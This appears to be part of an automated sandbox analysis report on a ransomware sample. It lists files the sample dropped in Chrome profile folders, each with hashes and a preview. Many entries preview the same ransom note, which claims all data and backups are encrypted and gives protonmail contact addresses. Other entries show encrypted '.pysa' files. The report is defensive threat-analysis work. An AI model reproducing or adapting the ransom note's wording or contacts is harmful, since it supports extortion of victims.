                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.921122343075104
                  Encrypted:false
                  SSDEEP:384:Pt7AIxbnAgqnelcuzpsRkSEKX3AubC+THWwGIK0o2lymcYpgd8:LxbnAfM7dPWnw9mK0oR6G+
                  MD5:FB813E639EC911333BA4C948FD3D1B85
                  SHA1:DC7D2954E07AA30C8A9DCFC85D9BF8A0BEF1F412
                  SHA-256:2D1E02A66DD18FDA48407DEBA56829BC8A0717155068D803650CB955BBCA0569
                  SHA-512:6163D102A92522AFD7B959BFD94F4F205B84034D6F3C9B27D18BF25C38F0CD77872C14C8DA3329292C940B22C5ACED14785FA12A1BCF00A6222974166C2FB843
                  Malicious:false
                  Preview: .Y#..b`X.@r...6.....#../.+.Yk.w>.`..j.`..j....9.7.I.|.l....{...)..1G..o.p..].... >k.t...b...`. ...*{.>.Wk...v...v.L....O.Tx.es..;..Rb-.>...P.5.. ..$...K:.u.......J*.\6`.'...n..l.O.z.7..c]....Sgh(.F...2J..H....B.j.3..<gL..>.,*).7>.:..e./...d.3.$.^P..Us..*.x.........~DOs...4N.....8.lM...5...G.AX...}_'[\...V..V.....S...m...9)..]......M.bT7.-!....x.4c..s....V.d.F..........w.......kJ...._.R.r...;...h.......S..P..&.."..{..9..P...G....!....3..B.....^d..r..\..../"]....Mf."....a.g..{.......D..jS.<...mo"V...YJ.y.[..Aj..h..4...........N.1..*5...K.l..J.."...qD)..>As.F6=.>.n._2U.8...i..Q.4..n.m\.^.w..yi.o7...........g.....t.{..e.....|..*..6...y9}K..i.<..'...2`.....cs!*oM......v..........>ks.....V=D['A.O.|...2M`K.D./Xe.l!....DN....y3.K.{b....!..q...i...$....]y=..8....).....s...u...4...'.J....B.......s.bU......}*O.5c.C.r.oo.5....~.$:..?7..x(.a.m..........5L...:b..:Eh+s.4..l\.|........=_..iUQ..a."..2O8).tP#.zG.E......e. .X.T).G.7...vb..`.t..+mY2.w
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8192
                  Entropy (8bit):7.59084953819288
                  Encrypted:false
                  SSDEEP:192:toY+LH+nCv3b2Up6JyERjK2Y3Yrxaj2PvVhudNSk:kACzB6RllDadV
                  MD5:3D5AE827B19DDCC597D49C48422C5A09
                  SHA1:99B3CAD24695FCD4F378E7BCA11703BC12682A17
                  SHA-256:5F664FA4CF9A7C4CAC40C5D61E39FDEEE1A93B32721B6BD0FFD669780A5C8D8C
                  SHA-512:E0373572CE6F68916C583F61FB97AA36CEF9CAFD7CA8ACD3DC4600CAB557352873A2D3D48E351448190232A5F77560D4FD8287B160B0315292434F2F29DCAA09
                  Malicious:false
                  Preview: ...qX......./.e.....<2.....L.<..+89m....'B..U2...{.ZI....kh...T;........A.BA@.z.98(;_./d8.... ....s.M...0zw....N.\Y.DU.....g...z.p7...Ekm....U.$9......1...k......iDB.y.'O:u......I..............T...u...?..U+.{m.eFB...8=I.,m.....8....6[@'.=......d.6..'..>...Q.j....]...^..#..G_...0.....#^.9}{.(8Y...PS..v.@..G.;.\.....:..%[..D..a;....i.Y$\..I.._...'.^Y.^.&..&.l.kDG.\T...6.A1.[...8&..,..`.x.c:..k..ne.........t...iJ....=...0.L.$.....W<.c..5h;.B..d5..Q[...Zj,.5r.Mw...O...NW....._\*.....avm.H....E.......[....0...[......W..QQ.CP,R6...P.B...<.Th..oM`.BYq.65..;.*...~..Qi.:.@..;...-$h{....))i...m....y~....Bk.O&..pq.,e.....FW%..K.v.|O....g.9.z[.....e.iKI.K.b.3.H.B......]?.....>./.UB.I.....y..M.....mH..)........Y"f8..^....a.h.A..S1I%_..r.d21..;SGBd.'../.r.7..C...0.... }.q$.x...0..,E\WD..........+c.w@p........$).?8$.B.~...U~i{.t.Y.9k[.W.C...nu.|..*w...c.3....5......*.KL.-h.f*V.Z...G...2.+e...?..@.|...Q5}#H3.......R.f.S4..........^..kB.i?...N.5.@..h
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_GB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_US\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
